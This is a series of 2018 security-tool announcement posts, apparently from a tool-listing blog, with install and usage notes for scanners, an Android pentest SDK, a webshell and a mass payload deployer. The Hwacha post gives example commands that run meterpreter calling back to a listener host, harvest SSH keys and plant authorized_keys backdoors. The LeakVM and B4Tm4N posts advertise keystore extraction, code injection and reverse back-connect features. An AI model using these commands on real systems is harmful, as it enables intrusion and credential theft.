LeakVM - Research & Pentesting Framework For Android, Run Security Tests Instantly

March 24, 2018, 1:39 pm

≫ Next: Rainmap Lite - Responsive Web Based Interface That Allows Users To Launch Nmap Scans From Their Mobiles/Tablets/Web Browsers

≪ Previous: PyRexecd - Standalone SSH Server For Windows

LeakVM: Run security tests instantly.

Why LeakVM:

LeakVM fast security test on Android, by skipping the time-consuming build pen-testing laboratories, you can test on real devices or virtual devices. LeakVM makes researchers and pen-testers more productive since they can run the test on real time and with zero knowledge on malware develop or attacks.

Our technology uses the same techniques used in criminal software, but in a controlled environment, you always have control over the SDK, our product, gives you a real approach against real malware and real attacks.

Why Pentesting:

With 2000 million active devices, 90% of mobile users are vulnerable to exploit kits (software vulnerabilities), Cyber crime damage costs to hit $6 trillion annually by 2021, Mobile Malware Shows Rapid Growth in Volume and Sophistication, Mobile security is a big data problem.

Unsecured devices and apps are the norm, In 2017 every 4.2 seconds a new malware specimen emerges, You need to reduce the threat surface.

Rewards:

Our platform is designed even so that anyone can make money with us, without any type of investment, by sharing your reseller link, the customer that is obtained will bring you rewards, now we have 3 methods of payment: Western Union, Wire Transfer and PayPal, These rewards will be received for life, is just share a link.
For first 100 customers: new client 20%, renewal 10%.
For next 900 clients: new client 15%, renewal 10%.
After reaching 1000 clients: new client 10%, renewal 5%.

Questions:
I can inject ELF/APK code inside of the sandbox of any package ?
Yes, you can.

I can load external libraries ?
Yes, from Git's, Mediafire and another sources.

I can start a HTTP service ?
Yes, as synchronous and asynchronous way.

I can start a HTTP client ?
Yes, we have one, very configurable.

I can analyze security on ELF as V.A.S ? Yes, you can.

I can bypass OOP protections ?
Yes, there not exist: 'package', 'private', 'protected' or 'final'.

I can extract private files from external packages ?
Yes, you can see and get any file.

I can hack the Keystore ?
Yes, you can.

I can trick the Context ?
Yes, you can.

I can hack the SmartLock ?
Yes, you can.

I can use reflections in simple way ?
Yes, you can.

I can see the Linux system in simple way ?
Yes, you can.

I can install it on simple way ?
Yes, just with 2 lines on the gradle.

I can develop plugins with it ?
Yes, on the same way as AAR library.

Any can use it in a simple way ?
Yes, we develop it for dummies.

Features:

Ptrace/ASLR/Yama Bypass
API for 3rd party projects
Linux common features
Dynamic library loading
SmartLock extraction
Private file extractor
KeyStore extraction
Advanced reflection
WebServices Engine
Privilege escalation
Context Spoofers
Core Observers
Library injection
OOP Bypass
Extensible

Support:

Android 4.4 to 6.0
Architectures Arm(32/64 bits), x86(32/64 bits), MIPS(32/64 bits)

Samples:
Where is JavaDoc
How configure a Virtual Device
How Install LeakVM SDK
How Connect to API
How Test Exploits
How use Common IO methods
How to Load libraries
How to Sudo& Runas
How compile a native binary (ELF)
How to run loaded code
How to Hack OOP
How to Inject code Native/VM
How build VM Code to Inject

Downloads:
LeakVM APP
LeakVM SDK 1.0.0

Web Interface:
LeakVM Console

Social Media:
Twitter
LinkedIn
Facebook
Instagram
LeakVM Developers Group

Download LeakVM

↧

Rainmap Lite - Responsive Web Based Interface That Allows Users To Launch Nmap Scans From Their Mobiles/Tablets/Web Browsers

March 25, 2018, 6:38 am

≫ Next: SubOver - A Powerful Subdomain Takeover Tool

≪ Previous: LeakVM - Research & Pentesting Framework For Android, Run Security Tests Instantly

Rainmap Lite - Responsive web application that allows users to launch Nmap scans from their mobiles/tablets/web browsers!

Unlike it's predecessor [1], Rainmap-lite does not require special services (RabbitMQ, PostgreSQL, Celery, supervisor, etc) to make it easy to install on any server. You simply need to install the Django application and add the cron polling task to set up a new scanning server. Nmap scans on the road for everyone!

[1] Rainmap - https://nmap.org/rainmap/

Features

Easily launch Nmap scans with a few clicks.
Responsive interface runs smoothly from your phone/tablet.
Reports delivered by email in all formats.
View reports from your web browser.
Schedule scans.
Dozens of scanning profiles to choose from.
Easy to install/set up.
Share results with your team.

This project is still in beta version. Any feedback, bug reports and PRs are greatly appreciated!

Demo

Documentation
You can find all the documentation related to this project on the Wiki

Screenshots

*Responsive interface

* Customizable

* Scanning profiles

* Site Administration allows managements of users, scanning profiles and scans

* Cron based

* Results delivered by email

Download Rainmap Lite

↧

SubOver - A Powerful Subdomain Takeover Tool

March 25, 2018, 2:39 pm

≫ Next: XSStrike v2.0 - An Advanced XSS Detection And Exploitation Suit

≪ Previous: Rainmap Lite - Responsive Web Based Interface That Allows Users To Launch Nmap Scans From Their Mobiles/Tablets/Web Browsers

Subover is a Hostile Subdomain Takeover tool designed in Python. From start, it has been aimed with speed and efficiency in mind. Till date, SubOver detects 36 services which is much more than any other tool out there. The tool is multithreaded and hence delivers good speed. It can easily detect and report potential subdomain takeovers that exist. The list of potentially hijackable services is very comprehensive and it is what makes this tool so powerful.

Installing
You need to have Python 2.7 installed on your machine. The following additional requirements are required -

dnspython
colorama

git clone https://github.com/Ice3man543/SubOver.git .
cd SubOver
# consider installing virtualenv
pip install -r requirements.txt
python subover.py -h

Usage
python subover.py -l subdomains.txt -o output_takeovers.txt

-l subdomains.txt is the list of target subdomains. These can be discovered using various tool such as sublist3r or others.
-o output_takeovers.txtis the name of the output file. (Optional & Currently not very well formatted)
-t 20 is the default number of threads that SubOver will use. (Optional)
-V is the switch for showing verbose output. (Optional, Default=False)

Currently Checked Services

Github
Heroku
Unbounce
Tumblr
Shopify
Instapage
Desk
Tictail
Campaignmonitor
Cargocollective
Statuspage
Amazonaws
Cloudfront
Bitbucket
Squarespace
Smartling
Acquia
Fastly
Pantheon
Zendesk
Uservoice
WPEngine
Ghost
Freshdesk
Pingdom
Tilda
Wordpress
Teamwork
Helpjuice
Helpscout
Cargo
Feedpress
Freshdesk
Surge
Surveygizmo
Mashery

Count : 36

FAQ
Q: What should my wordlist look like?
A: Your wordlist should include a list of subdomains you're checking and should look something like:

backend.example.com
something.someone.com
apo-setup.fxc.something.com

Your tool sucks!
Yes, you're probably correct. Feel free to:

Not use it.
Show me how to do it better.

Contact
Twitter: @Ice3man543

Credits

Download SubOver

↧

XSStrike v2.0 - An Advanced XSS Detection And Exploitation Suit

March 26, 2018, 5:31 am

≫ Next: Retire.Js - Scanner Detecting The Use Of JavaScript Libraries With Known Vulnerabilities

≪ Previous: SubOver - A Powerful Subdomain Takeover Tool

XSStrike is an advanced XSS detection suite. It has a powerful fuzzing engine and provides zero false positive result using fuzzy matching. XSStrike is the first XSS scanner to generate its own payloads. It is intelligent enough to detect and break out of various contexts.

Made by Somdev Sangwan

Features

Powerful fuzzing engine
Context breaking technology
Intelligent payload generation
GET & POST method support
Cookie Support
WAF Fingerprinting
Hand crafted payloads for filter and WAF evasion
Hidden parameter discovery
Accurate results via levenshtein distance algorithm

To know more visit xsstrike.tk

Installation
XSStrike is compatible with all *nix based operating systems running Python 2.7. Why not windows? My life, my rules. My code, my tools. Just kidding, it will run on windows as well but you will see some weird codes instead of color. First of all clone the repo by entering the following command in terminal

git clone https://github.com/UltimateHackers/XSStrike

Now naviagte to XSStrike directory

cd XSStrike

Now install the requirements with the following command

pip install -r requirements.txt

Now you can run XSStrike

python xsstrike

Screenshots

Download XSStrike

↧

Retire.Js - Scanner Detecting The Use Of JavaScript Libraries With Known Vulnerabilities

March 26, 2018, 1:38 pm

≫ Next: Webscreenshot - A Simple Script To Screenshot A List Of Websites

≪ Previous: XSStrike v2.0 - An Advanced XSS Detection And Exploitation Suit

What you require you must also retire
There is a plethora of JavaScript libraries for use on the Web and in Node.JS apps out there. This greatly simplifies development,but we need to stay up-to-date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 list of security risks and insecure libraries can pose a huge risk to your Web app. The goal of Retire.js is to help you detect the use of JS-library versions with known vulnerabilities.
Retire.js can be used in many ways:

Command line scanner
Scan a web app or node app for use of vulnerable JavaScript libraries and/or Node.JS modules. In the source code folder of the application folder run:

$ npm install -g retire
$ retire

Grunt plugin
A Grunt task for running Retire.js as part of your application's build routine, or some other automated workflow.

Gulp task
An example of a Gulp task which can be used in your gulpfile to watch and scan your project files automatically. You can modify the watch patterns and (optional) Retire.js options as you like.

var gulp = require('gulp');
var spawn = require('child_process').spawn;
var gutil = require('gulp-util');

gulp.task('retire:watch', ['retire'], function (done) {
    // Watch all javascript files and package.json
    gulp.watch(['js/**/*.js', 'package.json'], ['retire']);
});

gulp.task('retire', function() {
    // Spawn Retire.js as a child process
    // You can optionally add option parameters to the second argument (array)
    var child = spawn('retire', [], {cwd: process.cwd()});

    child.stdout.setEncoding('utf8');
    child.stdout.on('data', function (data) {
        gutil.log(data);
    });

    child.stderr.setEncoding('utf8');
    child.stderr.on('data', function (data) {
        gutil.log(gutil.colors.red(data));
        gutil.beep();
    });
});

Chrome and firefox extensions
Scans visited sites for references to insecure libraries, and puts warnings in the developer console. An icon on the address bar displays will also indicate if vulnerable libraries were loaded.

Burp and OWASP ZAP plugin
@h3xstream has adapted Retire.js as a plugin for the penetration testing tools Burp and OWASP ZAP. An alternative OWASP ZAP plugin exists at https://github.com/nikmmy/retire/

Download Retire.Js

↧

Webscreenshot - A Simple Script To Screenshot A List Of Websites

March 27, 2018, 5:49 am

≫ Next: Mooscan - A Scanner For Moodle LMS

≪ Previous: Retire.Js - Scanner Detecting The Use Of JavaScript Libraries With Known Vulnerabilities

A simple script to screenshot a list of websites, based on the url-to-image phantomjs script.

Features

Integrating url-to-image 'lazy-rendering' for AJAX resources
Fully functional on Windows and Linux systems
Cookie and custom HTTP header definition support
Multiprocessing and killing of unresponding processes after a user-definable timeout
Accepts several format as input target
Maps useful options of phantomjs such as ignoring ssl error, proxy definition and proxy authentication, HTTP Basic Authentication

Usage
Put your targets in a text file and pass it to the script (-i).
Screenshots will be available in your current ./screenshots/ directory (default).
Accepted input formats are the following:

http(s)://domain_or_ip:port(/ressource)
domain_or_ip:port(/ressource)
domain_or_ip(/ressource)

Options

$ python webscreenshot.py -h
Usage: webscreenshot.py [options]

Options:
  -h, --help            show this help message and exit

  Main parameters:
    -i INPUT_FILE, --input-file=INPUT_FILE
<INPUT_FILE>: text file containing the target list.
                        Ex: list.txt
    -o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY
<OUTPUT_DIRECTORY> (optional): screenshots output
                        directory (default './screenshots/')
    -w WORKERS, --workers=WORKERS
<WORKERS> (optional): number of parallel execution
                        workers (default 2)
    -v, --verbosity     <VERBOSITY> (optional): verbosity level, repeat it to
                        increase the level { -v INFO, -vv DEBUG } (default
                        verbosity ERROR)

  Input processing parameters:
    -p PORT, --port=PORT
<PORT> (optional): use the specified port for each
                        target in the input list. Ex: -p 80
    -s, --ssl           <SSL> (optional): enforce ssl for every connection
    -m, --multiprotocol
<MULTIPROTOCOL> (optional): perform screenshots over
                        HTTP and HTTPS for each target

  HTTP parameters:
    -c COOKIE, --cookie=COOKIE
<COOKIE_STRING> (optional): cookie string to add. Ex:
                        -c "JSESSIONID=1234; YOLO=SWAG"
    -a HEADER, --header=HEADER
<HEADER> (optional): custom or additional header.
                        Repeat this option for every header. Ex: -a "Host:
                        localhost" -a "Foo: bar"
    -u HTTP_USERNAME, --http-username=HTTP_USERNAME
<HTTP_USERNAME> (optional): specify a username for
                        HTTP Basic Authentication.
    -b HTTP_PASSWORD, --http-password=HTTP_PASSWORD
<HTTP_PASSWORD> (optional): specify a password for
                        HTTP Basic Authentication.

  Connection parameters:
    -P PROXY, --proxy=PROXY
<PROXY> (optional): specify a proxy. Ex: -P
                        http://proxy.company.com:8080
    -A PROXY_AUTH, --proxy-auth=PROXY_AUTH
<PROXY_AUTH> (optional): provides authentication
                        information for the proxy. Ex: -A user:password
    -T PROXY_TYPE, --proxy-type=PROXY_TYPE
<PROXY_TYPE> (optional): specifies the proxy type,
                        "http" (default), "none" (disable completely), or
                        "socks5". Ex: -T socks
    -t TIMEOUT, --timeout=TIMEOUT
<TIMEOUT> (optional): phantomjs execution timeout in
                        seconds (default 30 sec)

Examples

list.txt
--------
http://google.fr
https://173.194.67.113
173.194.67.113
https://duckduckgo.com/robots.txt


Default execution
-----------------
$ python webscreenshot.py -i list.txt
webscreenshot.py version 1.0

[+] 4 URLs to be screenshot
[+] 4 actual URLs screenshot
[+] 0 errors


Increasing verbosity level execution
-----------------------------------
$ python webscreenshot.py -i list.txt -v
webscreenshot.py version 1.1

[INFO][General] 'http://google.fr' has been formatted as 'http://google.fr:80' with supplied overriding options
[INFO][General] 'https://173.194.67.113' has been formatted as 'https://173.194.67.113:443' with supplied overriding options
[INFO][General] '173.194.67.113' has been formatted as 'http://173.194.67.113:80' with supplied overriding options
[INFO][General] 'https://duckduckgo.com/robots.txt' has been formatted as 'https://duckduckgo.com:443/robots.txt' with supplied overriding options
[+] 4 URLs to be screenshot
[INFO][http://173.194.67.113:80] Screenshot OK
[INFO][https://173.194.67.113:443] Screenshot OK
[INFO][http://google.fr:80] Screenshot OK
[INFO][https://duckduckgo.com:443/robots.txt] Screenshot OK
[+] 4 actual URLs screenshot
[+] 0 errors

Results
-------
$ ls -l screenshots/
total 61
-rwxrwxrwx 1 root root 35005 Jan 12 19:46 http___173.194.67.113_80.png
-rwxrwxrwx 1 root root 38152 Jan 12 19:46 http___google.fr_80.png
-rwxrwxrwx 1 root root 35005 Jan 12 19:46 https___173.194.67.113_443.png
-rwxrwxrwx 1 root root 12828 Jan 12 19:46 https___duckduckgo.com_443_robots.txt.png

Requirements

Python 2.7
webscreenshot python script:
- The easiest way to setup it: pip install webscreenshot and then directly use $ webscreenshot
- Or git clone that repository
Phantomjs > 2.x : follow the installation guide and check the FAQ if necessary

Changelog

version 2.1 - 01/14/2018: Multiprotocol option addition and PyPI packaging
version 2.0 - 03/08/2017: Adding proxy-type option
version 1.9 - 01/10/2017: Using ALL SSL/TLS ciphers
version 1.8 - 07/05/2015: Option groups definition
version 1.7 - 06/28/2015: HTTP basic authentication support + loglevel option changed to verbosity
version 1.6 - 04/23/2015: Transparent background fix
version 1.5 - 01/11/2015: Cookie and custom HTTP header support
version 1.4 - 10/12/2014: url-to-image phantomjs script integration + few bugs corrected
version 1.3 - 08/05/2014: Windows support + few bugs corrected
version 1.2 - 04/27/2014: few bugs corrected
version 1.1 - 04/21/2014: Changed the script to use phantomjs instead of the buggy wkhtml binary
version 1.0 - 01/12/2014: Initial commit

Contact

Thomas Debize < tdebize at mail d0t com >

Download Webscreenshot

↧

Mooscan - A Scanner For Moodle LMS

March 27, 2018, 1:22 pm

≫ Next: WhoAmIMailBot - A Service To Mask Your Email

≪ Previous: Webscreenshot - A Simple Script To Screenshot A List Of Websites

A scanning tool for Moodle LMS.

Key Benefits

Allows administrators to determine exactly what is visible externally in their Moodle installation.
A tool for penetration testers to find potential vulnerabilities in a Moodle installation by enumerating installed plugins, themes and libraries.

Road Map
To be defined once the basic (MVP!) tool is released, functional and reliable.

Download Mooscan

↧

WhoAmIMailBot - A Service To Mask Your Email

March 28, 2018, 5:51 am

≫ Next: Envizon - Network Visualization Tool With Focus On Red / Blue Team Requirements

≪ Previous: Mooscan - A Scanner For Moodle LMS

What is it?

A service to mask your e-mails, it was inspired by Blur service, where you create a alias for your e-mail, and use it to signup on applications, but the problem on Blur, is that all e-mails pass trough they infraestructure, and I don't need anybody looking on my e-mails, to solve that, I created WhoAmIMailBot that's similar to Blur service, and runs on your own infraestructure.

How it works?

Basically you need a domain, to not expend money you can use no-ip services, one VPS that allows smtp outbound, a telegram bot id, your telegram user id and this project, when you have all these things, you're ready to go. Your VPS will run a postfix that'll just redirect e-mails using the postfix function of virtual alias, where you set a e-mail address to redirect all incoming messages to another e-mail, the no-ip domain will be domain wich you'll use on your alias e-mails, and the telegram bot will manage your alias.

Install

git clone https://github.com/mthbernardes/WhoAmIMailBot.git
cd WhoAmIMailBot
docker build -t whoamimailbot --build-arg domain=your-domain-goes-here.ddns.net  .
docker run -p 25:25 -d -v /data/postfix/:/data whoamimailbot -t telegram-bot-api -d your-domain-goes-here.ddns.net -i your-telegram-user-id,another-telegram-user-id

Usage
On your telegram bot you have the follow commands,

Command	Description
/list	List all available aliasi
/new mail@mail.com	Create a new alias for the given mail
/delete bystring	Delete alias by a given string

Download WhoAmIMailBot

↧

Envizon - Network Visualization Tool With Focus On Red / Blue Team Requirements

March 28, 2018, 1:14 pm

≫ Next: Adhrit - Android APK Reversing And Analysis Tool That Can Help Secuity Researchers And CTF Enthusiasts Alike

≪ Previous: WhoAmIMailBot - A Service To Mask Your Email

This tool is designed, developed and supported by evait security. In order to give something back to the security community, we publish our internally used and developed, state of the art network visualization and organization tool, 'envizon'. We hope your feedback will help to improve and hone it even further.

Core Features:

Scan networks with predefined or custom nmap queries
Order clients with preconfigured or custom groups
Search through all attributes of clients and create complex linked queries
Get an overview of your targets during pentests with predefined security labels
Save and reuse your most used nmap scans
Collaborate with your team on the project in realtime
Export selected clients in a text file to connect other tools fast

How to start?!
To avoid compatibility and dependency issues, and to make it easy to set up, we use Docker. You can build your own images or use prebuilt ones from Docker Hub.

Using Docker
Docker and Docker Compose are required.

git clone https://github.com/evait-security/envizon
cd envizon
# Create self-signed certificates:
mkdir .ssl
openssl req -x509 -sha256 -nodes -newkey rsa:2048 -days 365 -keyout .ssl/localhost.key -out .ssl/localhost.crt
# If you want to use certificates located elsewhere, provide their pathes with SSL_CERT_PATH and SSL_KEY_PATH
# Create a secret, if you have rails installed locally you can just use:
rails secret
# otherwise, use openssl:
openssl rand -hex 64
# this needs to be provided either as an environment variable (SECRET_KEY_BASE), or added in the docker-compose.yml
sudo docker-compose up

Development
If, for whatever reason, you want to run the development environment in production, you should probably consider changing the secrets in config/secrets.yml, and maybe even manually activate SSL.

git clone https://github.com/evait-security/envizon
cd envizon
sudo docker-compose -f docker-compose-development.yml up

Running tests:

docker exec -it envizon_container_name_1 /bin/ash -c 'rails test'

Without Docker
Requires a PostgreSQL server.
Create a database envizon with a user envizon. Password and socket location can be modified in the docker-compose.yml. Your user needs SUPERUSER privileges; otherwise database import (and tests) won't work, because of foreign key constraints: use ALTER USER user WITH SUPERUSER;.

git clone https://github.com/evait-security/envizon
cd envizon
bundle install --path vendor/bundle

You need to create a secret and SSL certificates, as described above.
Then, run it with:

RAILS_ENV=production
export RAILS_ENV
SECRET_KEY_BASE=YOUR_SECRET
export SECRET_KEY_BASE
bundle exec rails db:setup
bundle exec rails db:migrate
bundle exec rails db:seed
bundle exec rails assets:precompile
RAILS_FORCE_SSL=true RAILS_SERVE_STATIC_FILES=true bundle exec rails s

Development
Databases for development and testing are called envizon_test and envizon_development, with the same requirements as above. Different database names and credentials can be provided via environment variables or directly modified in config/database.yml

git clone https://github.com/evait-security/envizon
cd envizon
bundle install --path vendor/bundle
RAILS_ENV=development
export RAILS_ENV
bundle exec rails db:setup
bundle exec rails db:migrate
bundle exec rails db:seed
bundle exec rails s

To run the tests:

RAILS_ENV=test db:setup
bundle exec rails test

Start with prebuilt images and postgresql docker image
Coming Soon™

Set a password
After starting the docker images go to: https://localhost:3000/ (or http://localhost:3000 if not using SSL)
You have to specify a password for your envizon instance. You can change it in the settings interface after logging in.

Scan interface
The scan interface is divided in two sections. On the left side you can run a new scan with preconfigured parameters or your own nmap fu. You also have the possibility to upload previously created nmap scans (with the -oX parameter).

On the right side you will see your running and finished scans.

Groups
The group interface is the heart of envizon. You can select, group, order, quick search, global search, move, copy, delete and view your clients. The left side represents the group list. If you click on a group you will get a detailed view in the center of the page with the group content. Each client in a group has a link. By clicking on the IP address you will get a more detailed view on the right side with all attributes, labels, ports and nmap output.
Most of the buttons and links have tooltips.

Global Search
In this section you can search for nearly anything in the database and combine each search parameter with 'AND', 'OR' & 'NOT'.
Perform simple queries for hostname, IP, open ports, etc. or create combined queries like: hostname contains 'win' AND mac address starts with '0E:5C' OR has port 21 and 22 open.

FAQ
API ?!

Currently not. We will work on it. Maybe.

Which browsers are supported?

Latest Chrome / Chromium / Inox & Firefox / Waterfox.

Why rails?!

Wanted to learn ruby. It's cool.

Why so salty on github issue discussion?

This is a community project. We are a full time pentesting company and will not go into / care about every open issue that doesn't match our template or guidelines. If you get a rough answer or picture, you probably deserved it.

What frameworks and tools were used?

Ruby on Rails
ruby-nmap (https://github.com/sophsec/ruby-nmap)
Materialize CSS (http://materializecss.com/)
Fontawsome Icons (https://fontawesome.com/)
Material Icons (https://material.io/icons/)
Many, many helpful gems

Help?
You can get some information about the structure and usage on the official wiki.
https://github.com/evait-security/envizon/wiki

Download Envizon

↧

Adhrit - Android APK Reversing And Analysis Tool That Can Help Secuity Researchers And CTF Enthusiasts Alike

March 29, 2018, 5:59 am

≫ Next: Physics Platform - A Remote Hardware Hacking Platform

≪ Previous: Envizon - Network Visualization Tool With Focus On Red / Blue Team Requirements

Adhrit is an open source Android APK reversing and analysis tool that can help security researchers and CTF enthusiasts alike. The tool is an effort to cut down on the amount of time spent on reversing and basic reconnaissance of Android applications. The project is still under progress and will continually incorporate features with time.

USES:

Extracts the apk contents.
Disassembles native libraries
Extracts jar out of dex.
Extracts source code in Java.
Extracts source code in Smali.
Recompiles smali into APK
Signs the APK
Checks for bytecode injection points.
Analyzes permissions used by the application.
Dumps the Manifest.
Dumps the certificate details.
Checks for malware footprints in the VirusTotal database.

PRE-REQUISITES:

Linux or MAC
Java JDK

USAGE:

Dowload the zip or clone the package and extract the tool ( git clone https://github.com/abhi-r3v0/Adhrit.git ).
Place the application in the tool directory.
Open a terminal and cd into the directory.
Run python installer.py for installing the necessary tools.
Use python adhrit.py -h for usage help.

Example: python adhrit.py -a my_app.apk

SCREENSHOTS:

NOTE:

Filenames with two '.' may give an error. Please rename the apk in such cases. For example, if your file name is my.app.apk, rename it to myapp.apk

Download Adhrit

↧

Physics Platform - A Remote Hardware Hacking Platform

March 29, 2018, 2:12 pm

≫ Next: Hwacha - Deploy Payloads To *Nix Systems En Masse

≪ Previous: Adhrit - Android APK Reversing And Analysis Tool That Can Help Secuity Researchers And CTF Enthusiasts Alike

Physics platform is a tool for hardware systems (e.g: raspberryPi 3B). It retrieves data passing through the network and sends it to a control panel. It works the same way as a botnet by receiving remote commands. (you can imagine that as a black box).

Physics hardware
You can check repository of physics-hardware

INSTALLATION

1. composer update
2. generate .env with database information
3. php artisan migrate
4. php artisan physics:createUser username password
5. php artisan key:generate
6. configure your domain to public/ folder.
7. configure a cronjob (* * * * * php /physics-commandProject/artisan schedule:run >> /dev/null 2>&1)

Download Physics

↧

Hwacha - Deploy Payloads To *Nix Systems En Masse

March 30, 2018, 5:11 am

≫ Next: B4Tm4N - PHP WEBSHELL

≪ Previous: Physics Platform - A Remote Hardware Hacking Platform

Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.

$python hwacha.py 
&&&&     &&         &&        &&
&&&&&&&&&&&& &&         &&        &&      Created by Esteban Rodriguez   /~~\_
&&&&&&    &&     &&&&&&&&&&    &&   Web: https://www.n00py.io     /| '` *\
&&    &&   &&&&&      &&        &&&&&        Twitter: @n00py1         \|  ___/
&&      &&  &&&&&    &&  &&      &&&&&   _   _                     _
&&    &&   &&      &&    &&     &&     | | | |                   | |
&&&&&&    &&    &&&      &&&   &&     | |_| |__      ____ _  ___| |__   __ _
&&      &&   &&          &&  &&     |  _  |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&&                   &&     | | | | \ V  V / (_| | (__| | | | (_| |
&&                   &&     \_| |_/  \_/\_/ \__,_|\___|_| |_|\__,_| 
To run commands, use -x [COMMAND]
to run modules, use -m [MODULE]
to specify module options, use -o [ARG=ARG ARG=ARG]
to see all available modules, use -L
Example usage:
python hwacha.py -t 192.168.1.1/24 -u admin  -p password
python hwacha.py -t 192.168.1.100-200 -u admin  -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin  -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin  -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"


Available Modules:
[*] meterpreter               Use this to execute a meterpreter agent on the target(s).
                              REQURED ARGUMENTS: LHOST , LPORT
                              OPTIONAL ARGUMENTS: TYPE {python, php, 32, 64, osx}
[*] mimipenguin               Use this to execute a mimipenguin on the target(s) to recover credentials.  (Requires root)
                              OPTIONAL ARGUMENTS: LHOST, LPORT
[*] keys                      Use this to collect SSH private keys from the target(s).
[*] history                   Use this to collect shell history files from the target(s).
[*] privs                     Use this to enumerate sudo privileges on the targets(s).
[*] backdoor                  Creates an RSA key pair and adds public key to authorized_keys file on targets(s).
[*] web_delivery               Use this to execute a python script on the target(s).
                              REQURED ARGUMENTS: PATH
                              OPTIONAL ARGUMENTS: LISTEN
[*] custom_bin               Use this to execute a custom binary on the target(s).
                              REQURED ARGUMENTS: PATH
[*] sudo_exec               Use this to execute a custom binary (with sudo) on the target(s).
                              REQURED ARGUMENTS: PATH
[*] shellcode               Use this to execute custom shellcode on the target(s).
                              REQURED ARGUMENTS: PATH

Requires paramiko:

pip install paramiko

More info: https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/

Download Hwacha

↧

B4Tm4N - PHP WEBSHELL

March 30, 2018, 1:39 pm

≫ Next: 53R3N17Y - Python Based Script For Information Gathering

≪ Previous: Hwacha - Deploy Payloads To *Nix Systems En Masse

Features

[0] File Manager
[1] Sec. Info
[2] Simply Database
[3] Interactive terminal
[4] PHP Reverse Back Connect
[5] Run PHP Code
[6] Custom Toolz
[7] Self Script Encryptor !

Download B4Tm4N

↧

53R3N17Y - Python Based Script For Information Gathering

March 31, 2018, 6:15 am

≫ Next: Magescan - Scan A Magento Site For Information

≪ Previous: B4Tm4N - PHP WEBSHELL

Python based script for Information Gathering.

Operating Systems Tested

OSX El Capitan 10.11
Ubuntu 16.04
Backbox 5

Install

MacOSX
(as root)

  git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
>echo 'alias serenity="/usr/local/share/serenity && ./serenity"' > ~/.zshrc
  cd /usr/local/share/serenity
  pip install -r requirements.txt
  serenity -h

Linux
(as root)

  git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
>echo 'alias serenity="/usr/local/share/serenity && ./serenity"' > ~/.bashrc
  cd /usr/local/share/serenity
  pip install -r requirements.txt
  serenity -h

note: tested with Python 2.7.14

Download 53R3N17Y

↧

Magescan - Scan A Magento Site For Information

March 31, 2018, 2:24 pm

≫ Next: Pyfiscan - Web-Application Vulnerability And Version Scanner

≪ Previous: 53R3N17Y - Python Based Script For Information Gathering

The idea behind this is to evaluate the quality and security of a Magento site you don't have access to. The scenario when you're interviewing a potential developer or vetting a new client and want to have an idea of what you're getting into.

Installation

.phar

Download the magescan.phar file from the releases page
Run in command line with the php command

php magescan.phar scan:all www.example.com

Source

Clone this repository
Install with composer

git clone https://github.com/steverobbins/magescan magescan
cd magescan
curl -sS https://getcomposer.org/installer | php
php composer.phar install
bin/magescan scan:all www.example.com

n98-magerun
Clone into your ~/.n98-magerun/modules directory

mkdir -p ~/.n98-magerun/modules
git clone https://github.com/steverobbins/magescan ~/.n98-magerun/modules/magescan
magerun magescan:scan store.example.com

Composer

composer require steverobbins/magescan --dev

Include in your project
Add the following to your composer.json

"require": {
    "steverobbins/magescan": "dev-master"
}

Usage

$ magescan.phar scan:all store.example.com

Commands

scan:all

$ magescan.phar scan:all [--insecure|-k] [--show-modules] <url>

Run all scans on the given <url>.

Options

--format=FORMAT
Specify a different output format. Possible values:

default
json

--insecure, -k
If set, SSL certificates won't be validated

--show-modules
Lists all modules searched for, not just those found

scan:catalog

$ magescan.phar scan:catalog [--insecure|-k] <url>

Get catalog information

scan:modules

$ magescan.phar scan:modules [--insecure|-k] [--show-modules] <url>

Get installed modules

scan:patch

$ magescan.phar scan:patch [--insecure|-k] <url>

Get patch information

scan:server

$ magescan.phar scan:server [--insecure|-k] <url>

Check server technology

scan:sitemap

$ magescan.phar scan:sitemap [--insecure|-k] <url>

Check sitemap

scan:unreachable

$ magescan.phar scan:unreachable [--insecure|-k] <url>

Check unreachable paths

scan:version

$ magescan.phar scan:version [--insecure|-k] <url>

Get the version of a Magento installation
Show all modules that we tried to detect, not just those that were found

self-update

$ magescan.phar self-update

Updates the phar file to the latest version.

Download Magescan

↧

Pyfiscan - Web-Application Vulnerability And Version Scanner

April 1, 2018, 5:35 am

≫ Next: BadMod - BadMod Detect Website CMS, Website Scanner & Auto Exploiter

≪ Previous: Magescan - Scan A Magento Site For Information

Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.

Requirements

Python 2.7
Python modules PyYAML docopt
GNU/Linux web server

Testing is done mainly with GNU/Linux Debian stable. Windows is not currently supported.

Detects following software

ATutor
b2evolution
BigTree CMS
Bugzilla
Centreon
Claroline
ClipperCMS
CMSimple
CMSMS
Collabtive
Concrete5
Coppermine
Cotonti
Croogo
CubeCart
Dolibarr
Dotclear
Drupal
e107
EspoCRM
Etherpad
FluxBB
Foswiki
Gallery
Gollum
HelpDEZk
HumHub
ImpressCMS
ImpressPages
Jamroom
Joomla
Kanboard
KCFinder
LiteCart
Magnolia
Mahara
MantisBT
MediaWiki
Microweber
MiniBB
MODX Revolution
MoinMoin
MyBB
Nibbleblog
Open Source Social Network
OpenCart
osDate
ownCloud
Oxwall
PBBoard
phpBB3
PhpGedView
phpMyAdmin
Piwigo
Piwik
PmWiki
Postfix Admin
Redaxo
Roundcube
SaurusCMS
Serendipity
Shaarli
SMF
Spina CMS
SPIP
SquirrelMail
TestLink
TikiWiki
Trac
WikkaWiki
WordPress
X-Cart
Zenphoto
Zikula

Detects following end-of-life software:

Bugzilla 4.2 is end-of-life since 2015-11-30
Drupal 6 is end-of-life since 2016-02-24
Gallery 1
